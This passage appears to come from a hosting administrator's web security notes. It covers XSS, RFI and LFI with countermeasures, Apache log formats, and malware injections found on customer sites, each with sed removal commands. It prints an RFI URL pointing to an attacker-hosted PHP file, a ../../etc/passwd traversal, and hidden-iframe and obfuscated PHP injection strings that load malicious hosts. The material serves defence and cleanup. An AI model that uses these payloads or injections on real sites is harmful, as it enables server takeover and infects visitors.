    • Escape inputted data, eg. every > should be changed to &#62. Excaping also solve a problem with filtering that you may actually want users to be able to write "<iframe ... />" but with filtering such text would be deleted. Better than your own custom escape function is to use a dedicated library like ESAPI from OWASP that can be used with multiple languages among others .NET, PHP & Java or use the Microsoft AntiXSS in all-Microsoft environments.
  • Remote File Inclusion (RFI), is then a hacker is passing his own file as value to a querystring parameter.
    RFI Example : say your index.php will load content based on a querystring param, eg. index.php?pageid=5, which in index.php may be passed raw to include($_GET["pageid"]). However if a hacker writes this in his browsers url field index.php?pageid=http://rusiahackers.ru/bad.php, then "http://rusiahackers.ru/bad.php" would be passed to the php include() function and the bad.php script would actually execute which would lead to the hacker would gaining full control.
    RFI Counter measures :
    • Code to test that querystring parameters are legitimate.
    • Set allow_url_fopen = off to prohibit include() to retrieve files from remote servers.
    • Use .htaccess rules to block requests that have web addresses in it's querystring.
  • Local File Inclusion (LFI), is nearly the same as RFI, but instead of passing the hackers own remote file, the hacker try to match a local file containing relevant information eg. index.php?pageid=../../etc/passwd showing the contents of the passwd file on the web page.
    LFI Example : if your index.php load content like this : index.php?pageid=5 and your php code pass the pageid valud raw to include() as include($_GET["pageid"]), then a hacker would just have to try to guess the location of important system files on your web server, eg. the hacker could try the following url in his browser index.php?pageid=../../etc/passwd and if he get the correct location the passwd file would be written out in his browser. The hacker would then apply decrypting on the passwd file offline and eventually get root access to your server.
    LFI Counter measures :
    • Code to test that querystring parameters are legitimate.
    • Use .htaccess to block requests that move outside the website folder.
  • using any builtin upload functionality in the website, eg. register with a comment, blog or forum system and then upload a php file and then execute it by requesting it from a browser - these attacks can be counter measured by the programmers to allow only certain file types to be uploaded.
  • malware on a users computer spyware like keyloggers may be able to snatch credentials then browsing or using ftp, so if a user have such malware and login to the admin system or use ftp, then the hackers will have the same access to the servers file system that this user have - these attacks can only be counter measured by updated antivirus software on the computers from which people interact with the Beid website especially administrators.
  • standard dictionary attack on login pages, databases and ftp - these attacks can be counter measured by strong passwords.
  • known vulnerabilities in different programs and the OS itself, eg. Mambo, Joomla, Wordpress etc have wellknown vulnerabilities especially older versions - On websites using such older programs, it can be difficult to upgrade and also I am not confident that Ubuntu upgrades will not break existing websites - I think this is a hard problem to counter measure.
  • There are many many more ways to gain access to a system, eg. : etc., however the above list probably contain the most important methods for the majority of low profile web sites (we kind of web sites we host @ Favourite Design).

More info :



Appendix : Log file formats

  • /var/log/apache2/access.log : Apache main log file. Default is combined format :
    • %h : client address. Default the IP address but can be hostname if HostnameLookups is set to On.
    • %l : client identity (identd on remote host). This value is typically not available and instead set to '-'.
    • %u : userId of the person requesting the page. If page is not password protected, the value is not available and set to '-'.
    • %t : time the server finished the request as [day/month/year:hour:minute:second zone] (the time is postfixed time zone).
    • \"%r\" : request consisting of method (eg. GET), the resource (eg. /logo.gif) and the protocol (eg. HTTP/1.1).
    • %>s : status code send back to the client (2xx:success, 3xx:redirection, 4xx:errorByClient, 5:errorByServer).
    • %b : size of response send back to client not counting headers (zero response body size is shown as '-').
    • \"%{Referer}i\" : http request header referer, eg. if the request resource is /logo.gif, then the referer is the page that loads logo.gif.
    • \"%{User-agent}i\" : http request header user-agent, the string by which the client browser identifies itself.


Appendix : Real world malware injection examples

The following is a list of malware injections I have encountered on Favourite Design customer websites.

  • document.write('<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://ayblsn.pcanywhere.net/7963895f2092c01672baa3dd66114659.sys?11"></iframe>');
    • here the src is set to ayblsn.pcanywhere.net/7963895f2092c01672baa3dd66114659.sys?11, which is clearly a malware url that will be hidden (width:100px;left:-100px;) loaded on the web page.
    • Remove all instances from website :
      1. Navigate to the web root folder.
      2. shell> find . -type f -exec sed -i s%document\.write\(\'\<iframe[^\<]*ayblsn\.pcanywhere[^\<]*\</iframe\>\'\)%%g {} \; : note that sed does not support non-greedy expressions so I use '[^\<]*' instead of '.*' to avoid greedy matching.
  • <!--c3284d--><script type="text/javascript">document.write('<iframe src="http://playart.org/sites/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');</script><!--/c3284d-->
    • here the src is set to playart.org/sites/stats.php, which is a page that is hacked to deliver malicious code.
    • Remove all instances from website :
      1. Navigate to the web root folder.
      2. shell> find . -type f -exec sed -i -n '1h;1!H;${;g;s/>!--c3284d--<.*>!--\/c3284d--<//g;p}' {} \;
  • <!--c3284d--><script type="text/javascript" language="javascript" src="http://OurCustomerDomain//test/jquery.ui.button.min.js" ></script><!--/c3284d-->
    • here a script reference is injected pointing to a script file that in turns write out an iframe loading malicious code.
    • Remove all instances from website :
      1. Navigate to the web root folder.
      2. shell> find . -type f -exec sed -i -n '1h;1!H;${;g;s/<!--c3284d-->.*<!--\/c3284d-->//g;p}' {} \;
      3. Delete the http://OurCustomerDomain//test/jquery.ui.button.min.js file.
  • $s=substr(8,1);foreach(array(52,123 ... urlencode(strrev($d)).$t[7].$t[3].$t[0].$t[9].$t[1].$t[3]);}
    • here a php script consisting mostly of a lot of number encoded characters to obfuscate what is going on.
    • Remove all instances from website :
      1. Navigate to the web root folder.
      2. shell> find . -name "*.php" | xargs sed -i s/\$s=substr.*$// : here it is assumed that the code to remove is on 1 line and that no legit code is after on the same line. It is also assumed that this malware is only existing in php files (it could also be written inside html files, but I have never seen it).
  • <wniwlmemfhxytkjwrmkefshuqluyvkav><script>function ojq()</script></wniwlmemfhxytkjwrmkefshuqluyvkav>
  • Ubuntu access.log snippet (/var/log/apache2/access.log) shows dictionary attack :
    Feb  1 10:41:11 d1 sshd[27876]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=183.61.135.233  user=root
    Feb  1 10:41:11 d1 sshd[27876]: pam_winbind(sshd:auth): getting password (0x00000388)
    Feb  1 10:41:11 d1 sshd[27876]: pam_winbind(sshd:auth): pam_get_item returned a password
    Feb  1 10:41:11 d1 sshd[27876]: pam_winbind(sshd:auth): request wbcLogonUser failed: WBC_ERR_AUTH_ERROR, PAM error: PAM_USER_UNKNOWN (10), NTSTATUS: NT_STATUS_NO_SUCH_USER, Error message was: No such user
    Feb  1 10:41:13 d1 sshd[27876]: Failed password for root from 183.61.135.233 port 15340 ssh2
    
    Above someone from China (183.61.135.233) tries to SSH login as root. I get 10-20 of these every minute over a span of multiple days using a list of likely usernames paired with likely passwords. I don't know of a good way to avoid these attacks, though I have considered blocking China, India and Iran. To avoid being an easy target for dictionary attacks, it is best to NOT let your customers create SSH, FTP & Backoffice passwords but let them ask you to create passwords for them.


Appendix : Malware classifications

  • Trojans
  • Virus
  • Worms


Comments

You can comment without logging in
 
 B  U  I  S 
Words: Chars: Chars left: 
 Captcha 
 Nickname
Facebook
    




click to top